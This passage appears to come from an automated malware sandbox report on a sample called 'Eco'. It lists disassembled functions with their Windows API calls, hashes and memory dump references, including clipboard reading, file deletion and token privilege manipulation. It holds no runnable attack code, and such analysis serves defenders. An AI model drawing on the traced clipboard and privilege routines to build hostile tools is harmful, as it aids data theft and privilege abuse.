                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Exception@8Throw_memsetstd::exception::exception
                          • String ID:
                          • API String ID: 525207782-0
                          • Opcode ID: c34491c4572dc16e51a14d0fcf010cac5864f028c0566f866116d8912fde49fb
                          • Instruction ID: dce4dec235c5792f35fc0e3c2ee1029d650459113dfac40e1c82ead0e59ce338
                          • Opcode Fuzzy Hash: c34491c4572dc16e51a14d0fcf010cac5864f028c0566f866116d8912fde49fb
                          • Instruction Fuzzy Hash: 3301D2742042059FD325EF58E455B01BBE1BF99310F24849AE5888B3A2DA72E8408F90
                          Function 0054DB8A Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00530F16: std::exception::exception.LIBCMT ref: 00530F4C
                            • Part of subcall function 00530F16: __CxxThrowException@8.LIBCMT ref: 00530F61
                          • _memmove.LIBCMT ref: 0054DBBB
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Exception@8Throw_memmovestd::exception::exception
                          • String ID:
                          • API String ID: 1602317333-0
                          • Opcode ID: 9c4b4b06b97a342b372b4b1ca5fb652688e856bb2ce843847531830677b80c8a
                          • Instruction ID: 816b1e97a328b488037f50d00ef6f3b9e9f55dfb3f3f3d0eb24e7b8c5f362e57
                          • Opcode Fuzzy Hash: 9c4b4b06b97a342b372b4b1ca5fb652688e856bb2ce843847531830677b80c8a
                          • Instruction Fuzzy Hash: EEF0A974600202DFE725DF68C995A11BFE1BF59304F24949CE5898B3A2E732E851CF92
                          Function 00524A8C Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: _fseek
                          • String ID:
                          • API String ID: 2937370855-0
                          • Opcode ID: 0a4098fbca966de150df0e901f011b960a22b5df12848eeca8f12985b6aae40b
                          • Instruction ID: ac479d50dca190e89c5af5351a6365bb16a93e00f9701ee01436841703ec4e7c
                          • Opcode Fuzzy Hash: 0a4098fbca966de150df0e901f011b960a22b5df12848eeca8f12985b6aae40b
                          • Instruction Fuzzy Hash: 83F052B6400218BFCF108F84EC04DABBF7AEB85320F004498F9045A210E232EA21CBA0
                          Function 00524A2F Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                          Download Yara Rule
                          APIs
                          • FreeLibrary.KERNEL32(?,?,?,005227AF,?,00000001), ref: 00524A63
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: FreeLibrary
                          • String ID:
                          • API String ID: 3664257935-0
                          • Opcode ID: fe3ae816fad952c9d5ab4ed41325f762a20aad53b58b62c896097a06381dad14
                          • Instruction ID: 389f4b029f37c5e15c020dcc64147f7b5335405fea8e6ad836c206760a17643b
                          • Opcode Fuzzy Hash: fe3ae816fad952c9d5ab4ed41325f762a20aad53b58b62c896097a06381dad14
                          • Instruction Fuzzy Hash: 41F01571145722CFCB349F64E894816BFF2BF16326320992EE5D783650C7319884DF54
                          Function 00524AB2 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: __fread_nolock
                          • String ID:
                          • API String ID: 2638373210-0
                          • Opcode ID: c46de0973e4316ba83ebc5d8e55475f12f35eb36bfefe38a98de0559b640b685
                          • Instruction ID: 70a0c37161ed637eb1f72ac36ccfb4219e95ccd39994efa330cff996bfb77fbd
                          • Opcode Fuzzy Hash: c46de0973e4316ba83ebc5d8e55475f12f35eb36bfefe38a98de0559b640b685
                          • Instruction Fuzzy Hash: 65F0F87240020DFFDF05CF90C945EAABB79FF14314F208589F9148B251D336DA61AB91
                          Function 005308F0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                          Download Yara Rule
                          APIs
                          • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 0053090F
                            • Part of subcall function 00521821: _memmove.LIBCMT ref: 0052185B
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: LongNamePath_memmove
                          • String ID:
                          • API String ID: 2514874351-0
                          • Opcode ID: 0982225da247ed641ac74f99b220854cf7b226ce6b7db6f47e3ecb81ad6c5ad2
                          • Instruction ID: 4b74a06996cd38c2994b58dc549b14ae79c52af95db1dfd30d524c1b8fc6988c
                          • Opcode Fuzzy Hash: 0982225da247ed641ac74f99b220854cf7b226ce6b7db6f47e3ecb81ad6c5ad2
                          • Instruction Fuzzy Hash: 08E08632A001295BC721D6989C09FEA77DDEFC9790F0401B6FC09D7244D9605C8186D5
                          Function 00573D64 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                          Download Yara Rule
                          APIs
                          • CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00573CEA,?,?,?), ref: 00573D7A
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: CopyFile
                          • String ID:
                          • API String ID: 1304948518-0
                          • Opcode ID: 97d73735368db41eca19b57d2fdf710da7bc53c1ba8e68d9cc72b8a09ed7897c
                          • Instruction ID: 35e3e74282bc1e27328cdf892275fc415bd6eb66b0594564231662bfa355bcab
                          • Opcode Fuzzy Hash: 97d73735368db41eca19b57d2fdf710da7bc53c1ba8e68d9cc72b8a09ed7897c
                          • Instruction Fuzzy Hash: 1ED0A7315E020CBBEF50DFA0CC06F68B7ACEB12706F1002A4B504D90E0DA7269189795
                          Function 00574E59 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                          Download Yara Rule
                          APIs
                          • GetFileAttributesW.KERNEL32(?,00573A6B), ref: 00574E5A
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: 6085b71edfbe6a55c3363fd655fd823d336e729ec50a5ad3ef335ba652d9ad67
                          • Instruction ID: 871147b7a22c9979878113638a569c13fe0def725ee0c8cba46a2f2f9707eb69
                          • Opcode Fuzzy Hash: 6085b71edfbe6a55c3363fd655fd823d336e729ec50a5ad3ef335ba652d9ad67
                          • Instruction Fuzzy Hash: 27B09224010600459E680E7829081993B08B8937B9FD86B80DC78858E2C3398C8BFA13
                          Function 005353AB Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: __wfsopen
                          • String ID:
                          • API String ID: 197181222-0
                          • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                          • Instruction ID: ffc3770441da815e4f20313d2cd63baf420f3201691855219261614c660525d8
                          • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                          • Instruction Fuzzy Hash: 69B0927644020C77CE012E82EC02A893F19AB806A8F409020FB0C18162A6B3A6609689
                          Function 005334BA Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                          Download Yara Rule
                          APIs
                          • _doexit.LIBCMT ref: 005334C4
                            • Part of subcall function 0053338B: __lock.LIBCMT ref: 00533399
                            • Part of subcall function 0053338B: DecodePointer.KERNEL32(005CAEF0,0000001C,005332E4,00530F33,00000001,00000000,?,00533232,000000FF,?,00539D8E,00000011,00530F33,?,00539BDC,0000000D), ref: 005333D8
                            • Part of subcall function 0053338B: DecodePointer.KERNEL32(?,00533232,000000FF,?,00539D8E,00000011,00530F33,?,00539BDC,0000000D), ref: 005333E9
                            • Part of subcall function 0053338B: EncodePointer.KERNEL32(00000000,?,00533232,000000FF,?,00539D8E,00000011,00530F33,?,00539BDC,0000000D), ref: 00533402
                            • Part of subcall function 0053338B: DecodePointer.KERNEL32(-00000004,?,00533232,000000FF,?,00539D8E,00000011,00530F33,?,00539BDC,0000000D), ref: 00533412
                            • Part of subcall function 0053338B: EncodePointer.KERNEL32(00000000,?,00533232,000000FF,?,00539D8E,00000011,00530F33,?,00539BDC,0000000D), ref: 00533418
                            • Part of subcall function 0053338B: DecodePointer.KERNEL32(?,00533232,000000FF,?,00539D8E,00000011,00530F33,?,00539BDC,0000000D), ref: 0053342E
                            • Part of subcall function 0053338B: DecodePointer.KERNEL32(?,00533232,000000FF,?,00539D8E,00000011,00530F33,?,00539BDC,0000000D), ref: 00533439
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Pointer$Decode$Encode$__lock_doexit
                          • String ID:
                          • API String ID: 2158581194-0
                          • Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                          • Instruction ID: a885adf2fc31c3c82ead7ad639de2d9f4883153e2bffbdb018caef67f264ddde
                          • Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                          • Instruction Fuzzy Hash: 0DB0123158430D33DB112541EC03F853F0C5780B54F104020FA0C1C1E1AAA3766580C9
                          Function 0057C0DD Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00573E72: FindFirstFileW.KERNEL32(?,?), ref: 00573EE9
                            • Part of subcall function 00573E72: DeleteFileW.KERNEL32(?,?,?,?), ref: 00573F39
                            • Part of subcall function 00573E72: FindNextFileW.KERNEL32(00000000,00000010), ref: 00573F4A
                            • Part of subcall function 00573E72: FindClose.KERNEL32(00000000), ref: 00573F61
                          • GetLastError.KERNEL32 ref: 0057C0FF
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: FileFind$CloseDeleteErrorFirstLastNext
                          • String ID:
                          • API String ID: 2191629493-0
                          • Opcode ID: 269e1fcda33ef4aeb6b9c85fc55ee0b287edbcf3b1fdb786d4c591f3a9f772e1
                          • Instruction ID: 93593db5e78f3bd5f3fcfc6645dbbabcc4cd228f02af46915090e89543dfec78
                          • Opcode Fuzzy Hash: 269e1fcda33ef4aeb6b9c85fc55ee0b287edbcf3b1fdb786d4c591f3a9f772e1
                          • Instruction Fuzzy Hash: D8F082362101158FDB14EF59E855F59BBE4BF85320F04C419F90A97352CB74BC41DB90

                          Non-executed Functions

                          Function 0059CEDF Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 632windowkeyboardCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 005129E2: GetWindowLongW.USER32(?,000000EB), ref: 005129F3
                          • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0059CF5A
                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0059CFB8
                          • GetWindowLongW.USER32(?,000000F0), ref: 0059CFF9
                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0059D023
                          • SendMessageW.USER32 ref: 0059D04C
                          • _wcsncpy.LIBCMT ref: 0059D0B8
                          • GetKeyState.USER32(00000011), ref: 0059D0D9
                          • GetKeyState.USER32(00000009), ref: 0059D0E6
                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0059D0FC
                          • GetKeyState.USER32(00000010), ref: 0059D106
                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0059D12F
                          • SendMessageW.USER32 ref: 0059D156
                          • SendMessageW.USER32(?,00001030,?,0059B735), ref: 0059D25A
                          • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0059D270
                          • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0059D283
                          • SetCapture.USER32(?), ref: 0059D28C
                          • ClientToScreen.USER32(?,?), ref: 0059D2F1
                          • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0059D2FE
                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0059D318
                          • ReleaseCapture.USER32 ref: 0059D323
                          • GetCursorPos.USER32(?), ref: 0059D35D
                          • ScreenToClient.USER32(?,?), ref: 0059D36A
                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0059D3C6
                          • SendMessageW.USER32 ref: 0059D3F4
                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0059D431
                          • SendMessageW.USER32 ref: 0059D460
                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0059D481
                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0059D490
                          • GetCursorPos.USER32(?), ref: 0059D4B0
                          • ScreenToClient.USER32(?,?), ref: 0059D4BD
                          • GetParent.USER32(?), ref: 0059D4DD
                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0059D546
                          • SendMessageW.USER32 ref: 0059D577
                          • ClientToScreen.USER32(?,?), ref: 0059D5D5
                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0059D605
                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0059D62F
                          • SendMessageW.USER32 ref: 0059D652
                          • ClientToScreen.USER32(?,?), ref: 0059D6A4
                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0059D6D8
                            • Part of subcall function 005129AB: GetWindowLongW.USER32(?,000000EB), ref: 005129BC
                          • GetWindowLongW.USER32(?,000000F0), ref: 0059D774
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                          • String ID: @GUI_DRAGID$F$pr]
                          • API String ID: 3977979337-1567868113
                          • Opcode ID: d021c4c578245dd4b7050fc7777143c9405c18527525520363e40bee79ddc46a
                          • Instruction ID: 1b578b2e4f6c8526c3ca8ffa530fca2600f8bfcd869486e06559c6c0aa117a36
                          • Opcode Fuzzy Hash: d021c4c578245dd4b7050fc7777143c9405c18527525520363e40bee79ddc46a
                          • Instruction Fuzzy Hash: 61429034104341AFDB20CF64C888EAABFF5FF89714F14491AF659872A1D731E859EBA1
                          Function 00568D11 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0056917C: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 005691C6
                            • Part of subcall function 0056917C: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 005691F3
                            • Part of subcall function 0056917C: GetLastError.KERNEL32 ref: 00569200
                          • _memset.LIBCMT ref: 00568D54
                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00568DA6
                          • CloseHandle.KERNEL32(?), ref: 00568DB7
                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00568DCE
                          • GetProcessWindowStation.USER32 ref: 00568DE7
                          • SetProcessWindowStation.USER32(00000000), ref: 00568DF1
                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00568E0B
                            • Part of subcall function 00568BCC: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00568D0A), ref: 00568BE1
                            • Part of subcall function 00568BCC: CloseHandle.KERNEL32(?,?,00568D0A), ref: 00568BF3
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                          • String ID: $default$winsta0
                          • API String ID: 2063423040-1027155976
                          • Opcode ID: 3f04510446c5777edf517248bd095a3b8444fe279ecda5dfde5f5e8b0d460141
                          • Instruction ID: ceaa60eb76256f4c93456ac51adb621fc9a596038b08c895f883a78b3eeddb8e
                          • Opcode Fuzzy Hash: 3f04510446c5777edf517248bd095a3b8444fe279ecda5dfde5f5e8b0d460141
                          • Instruction Fuzzy Hash: 04815871810209AFDF119FA4DC49AFEBFB9FF05304F14425AF911A72A1DB319E689B60
                          Function 00584416 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                          Download Yara Rule
                          APIs
                          • OpenClipboard.USER32(005A0980), ref: 00584440
                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 0058444E
                          • GetClipboardData.USER32(0000000D), ref: 00584456
                          • CloseClipboard.USER32 ref: 00584462
                          • GlobalLock.KERNEL32(00000000), ref: 0058447E
                          • CloseClipboard.USER32 ref: 00584488
                          • GlobalUnlock.KERNEL32(00000000,00000000), ref: 0058449D
                          • IsClipboardFormatAvailable.USER32(00000001), ref: 005844AA
                          • GetClipboardData.USER32(00000001), ref: 005844B2
                          • GlobalLock.KERNEL32(00000000), ref: 005844BF
                          • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 005844F3
                          • CloseClipboard.USER32 ref: 00584603
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                          • String ID:
                          • API String ID: 3222323430-0
                          • Opcode ID: fa985b577a29bf7da724e6684f003439dc7ba20de5f61887acb4a91dc2abbd7e
                          • Instruction ID: 013a412f3366346c21be365e99117d838a926a9d9458d120eb3f17de1293c564
                          • Opcode Fuzzy Hash: fa985b577a29bf7da724e6684f003439dc7ba20de5f61887acb4a91dc2abbd7e
                          • Instruction Fuzzy Hash: 84517D35244203ABD700FB60EC49F6E7BA8BFE5B51F004529F956A32E1DB7099099F62
                          Function 0057CC0C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileW.KERNEL32(?,?), ref: 0057CC3D
                          • FindClose.KERNEL32(00000000), ref: 0057CC91
                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0057CCB6
                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0057CCCD
                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0057CCF4
                          • __swprintf.LIBCMT ref: 0057CD40
                          • __swprintf.LIBCMT ref: 0057CD83
                            • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                          • __swprintf.LIBCMT ref: 0057CDD7
                            • Part of subcall function 005337FA: __woutput_l.LIBCMT ref: 00533853
                          • __swprintf.LIBCMT ref: 0057CE25
                            • Part of subcall function 005337FA: __flsbuf.LIBCMT ref: 00533875
                            • Part of subcall function 005337FA: __flsbuf.LIBCMT ref: 0053388D
                          • __swprintf.LIBCMT ref: 0057CE74
                          • __swprintf.LIBCMT ref: 0057CEC3
                          • __swprintf.LIBCMT ref: 0057CF12
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                          • API String ID: 3953360268-2428617273
                          • Opcode ID: 1a7a23701d2639a84f0a59299f0256c3f87d5dc85c2f7ad6afe0d00289b56e1e
                          • Instruction ID: 12659f7f16b25c6512d681c18ec324bbaf282ccd3458ee1db76205204b76b254
